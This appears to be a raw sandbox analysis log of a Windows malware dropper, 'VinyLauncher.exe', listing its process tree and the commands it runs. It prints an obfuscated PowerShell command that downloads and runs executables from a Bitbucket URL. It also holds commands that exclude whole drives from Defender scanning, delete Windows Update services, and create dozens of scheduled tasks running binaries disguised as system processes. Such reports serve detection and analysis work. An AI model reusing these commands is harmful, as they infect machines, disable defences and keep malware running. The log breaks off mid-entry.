PID 2740 wrote to memory of 3424	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 3424	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2396	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2396	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2268	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2268	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4360	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4360	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 1640	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 1640	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4084	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4084	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2884	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2884	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4288	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4288	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 3408	2740	savesinto.exe	cmd.exe
PID 2740 wrote to memory of 3408	2740	savesinto.exe	cmd.exe
PID 2504 wrote to memory of 3528	2504	locemsecurity.exe	powershell.exe
PID 2504 wrote to memory of 3528	2504	locemsecurity.exe	powershell.exe
PID 3408 wrote to memory of 4688	3408	cmd.exe	w32tm.exe
PID 3408 wrote to memory of 4688	3408	cmd.exe	w32tm.exe
PID 2504 wrote to memory of 3516	2504	locemsecurity.exe	cmd.exe
PID 2504 wrote to memory of 3516	2504	locemsecurity.exe	cmd.exe
PID 2504 wrote to memory of 2304	2504	locemsecurity.exe	cmd.exe
PID 2504 wrote to memory of 2304	2504	locemsecurity.exe	cmd.exe
PID 2504 wrote to memory of 3444	2504	locemsecurity.exe	powershell.exe
PID 2504 wrote to memory of 3444	2504	locemsecurity.exe	powershell.exe
PID 3516 wrote to memory of 3792	3516	cmd.exe	sc.exe
PID 3516 wrote to memory of 3792	3516	cmd.exe	sc.exe
PID 2304 wrote to memory of 2060	2304	cmd.exe	powercfg.exe
PID 2304 wrote to memory of 2060	2304	cmd.exe	powercfg.exe
PID 3516 wrote to memory of 4448	3516	cmd.exe	sc.exe
PID 3516 wrote to memory of 4448	3516	cmd.exe	sc.exe
PID 2304 wrote to memory of 4416	2304	cmd.exe	powercfg.exe
PID 2304 wrote to memory of 4416	2304	cmd.exe	powercfg.exe
PID 3516 wrote to memory of 1644	3516	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\VinyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\VinyLauncher.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZwBpACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHoAcABwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcgBjACMAPgA7ACIAOwA8ACMAdwBuAGIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAG0AYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AGMAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGgAYgAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAG4AbwBiAG8AZABvAGkAbQBwAG8AcgB0AGEAbgB0AGUALwBkAGkAbgBpAGEAcwBuAGQAaQBhAHMAbgBpAGQALwByAGEAdwAvAGYAOQAyADkANgA4ADkAMQBhADQAYQBmADgANQAxAGYAOAA2AGYAMgA2AGYAMQAwADAAYgBlADgAOQBhADQANABkAGEANgA5ADUAOABmADMALwByAG8AdQB0AGUALgBlAHgAZQAnACwAIAA8ACMAcwBoAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGMAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAGkAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAGgAZQBjAGsAcwB1AG0ALgBlAHgAZQAnACkAKQA8ACMAawBwAHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAG4AbwBiAG8AZABvAGkAbQBwAG8AcgB0AGEAbgB0AGUALwBkAGkAbgBpAGEAcwBuAGQAaQBhAHMAbgBpAGQALwByAGEAdwAvAGYAOQAyADkANgA4ADkAMQBhADQAYQBmADgANQAxAGYAOAA2AGYAMgA2AGYAMQAwADAAYgBlADgAOQBhADQANABkAGEANgA5ADUAOABmADMALwBsAGkAbQBtAC4AZQB4AGUAJwAsACAAPAAjAGUAZgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBuAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABoAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABvAGMAZQBtAHMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcAKQApADwAIwB1AHcAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHEAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBtAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBoAGUAYwBrAHMAdQBtAC4AZQB4AGUAJwApADwAIwBqAHEAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAHAAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcwBpAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABvAGMAZQBtAHMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcAKQA8ACMAbABtAHQAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#zpp#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#drc#>;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Users\Admin\AppData\Local\Temp\checksum.exe
"C:\Users\Admin\AppData\Local\Temp\checksum.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe
"C:\Users\Admin\AppData\Local\Temp\locemsecurity.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#jjwhcvemx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:3516

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1644

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1528

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:4444

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
5⤵
PID:4492

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
5⤵
- Modifies security service
PID:4040

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:3116

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
5⤵
PID:3632

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
5⤵
PID:5008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ihnnqfjnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskEditor" } Else { "C:\Program Files\Google\Chrome\updaterload.exe" }
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4668

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskEditor
5⤵
PID:2684

C:\hypersavesIntoRuntime\savesinto.exe
"C:\hypersavesIntoRuntime\savesinto.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/hypersavesIntoRuntime/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\PMuNIsfgyA.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
3⤵
PID:4688

C:\Recovery\WindowsRE\cmd.exe
"C:\Recovery\WindowsRE\cmd.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3892

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64045c3b-cd12-43e8-a424-e11ec0d0cdbc.vbs"
4⤵
PID:4768

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b6169fc5-0d62-4235-9609-016ad534c79c.vbs"
4⤵
PID:1204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Music\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Media Player\TrustedInstaller.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "savesintos" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\savesinto.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "savesintos" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\savesinto.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\Logs\SIH\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Windows\Logs\SIH\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\hypersavesIntoRuntime\MoUsoCoreWorker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 6 /tr "'C:\hypersavesIntoRuntime\MoUsoCoreWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Default\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "locemsecurityl" /sc MINUTE /mo 6 /tr "'C:\hypersavesIntoRuntime\locemsecurity.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\SystemApps\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemApps\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "locemsecurityl" /sc MINUTE /mo 6 /tr "'C:\hypersavesIntoRuntime\locemsecurity.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "locemsecurity" /sc ONLOGON /tr "'C:\hypersavesIntoRuntime\locemsecurity.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender\fr-FR\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\fr-FR\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Users\Default\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\hypersavesIntoRuntime\MoUsoCoreWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SIH\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3208

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:3792

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:4448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "savesinto" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\savesinto.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\TrustedInstaller.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\TrustedInstaller.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Music\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4744

C:\Windows\system32\schtasks.exe
